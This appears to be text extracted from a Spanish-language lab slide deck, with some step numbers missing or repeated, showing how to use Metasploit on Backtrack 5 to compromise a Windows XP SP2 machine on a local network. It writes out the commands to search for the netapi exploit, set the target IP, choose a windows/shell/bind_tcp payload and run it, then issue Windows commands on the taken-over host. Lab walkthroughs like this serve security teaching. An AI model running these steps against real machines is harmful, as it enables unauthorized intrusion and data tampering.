3. 2) Se abre una terminal en Backtrack 5. Se verifica la IP pues tienen que
estar en el mismo segmento de red. Se digita “msfconcole” para abrir el
programa.
4. 3) Así debe aparecer cuando ya inicialice el msfconsole.
5. 4) Se hace una búsqueda del exploit a utilizar con la palabra clave “netapi”.
Con el comando : “search netapi”
7. 7)Verificamos los datos necesarios para atacar la maquina. En
este caso es la IP de la maquina con Wxp-sp2.
8. 8) Se configura el RHOST con el comando: “set rhost
192.168.0.104” esta IP es del equipo Wxp-sp2.
9. 9) Se busca el Payload de la misma forma que se busco el exploit.
Comando: “search payload”. Cuando finalice la búsqueda utilizaremos
especifico con el comando: “set payload windows/shell/bind_tcp” con este
comando ingresaremos a la maquina con Wxp-sp2 por medio del cmd.
10. 10) Se pueden ver las opciones de como esta configurado el
exploit con el comando: “show options” damos enter.
11. 10) Con esto finaliza toda la configuracion del exploit. Solo queda atacar
la maquina con Wxp-sp2 con el comando: “exploit”. Si todo sale bien se
ve como sale en la imagen.
12. 12)Puede utilizar cualquier comando de windows ya se haya tomado control de
la maquina Wxp-sp2 desde msfconsole de tal forma que puede
editar, modificar, eliminar, etc. Cualquier cosa en windows.
En este ejemplo se creo una carpeta llamada “hola” con el comando: “mkdir
hola” ubicado en el directorio : documments and settingsall usersescritorio